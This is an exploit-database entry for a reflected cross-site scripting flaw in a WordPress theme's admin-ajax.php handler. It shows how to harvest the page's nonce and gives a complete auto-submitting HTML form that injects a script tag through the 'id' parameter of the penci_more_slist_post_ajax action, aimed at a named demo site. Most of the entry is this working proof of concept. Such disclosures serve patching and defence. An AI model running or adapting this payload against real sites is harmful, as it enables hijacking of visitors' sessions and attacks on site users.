## https://sploitus.com/exploit?id=WPEX-ID:7A244FB1-FA0B-4294-9B51-588BF5D673A2
A threat actor can collect the nonce value on the main webpage by searching for it on the ajax_var_more call:
var ajax_var_more = {"url":"https:\/\/soledaddemo.pencidesign.net\/wp-admin\/admin-ajax.php","nonce":"d6c491629c","errorPass":"<p class=\"message message-error\">Password does not match the confirm password<\/p>","login":"Email Address","password":"Password","headerstyle":"default"};
And then can create a webpage redirecting the user to a compromised version of the site such as:
```
<html>
<body onload="myform.submit()">
<form action="https://soledaddemo.pencidesign.net/wp-admin/admin-ajax.php" method="POST" name="myform">
<input type="hidden" name="action" value="penci_more_slist_post_ajax" />
<input type="hidden" name="id" value=""><script>alert`XSS-Checker`</script>" />
<input type="hidden" name="nonce" value="d6c491629c" />
</form>
</body>
</html>
```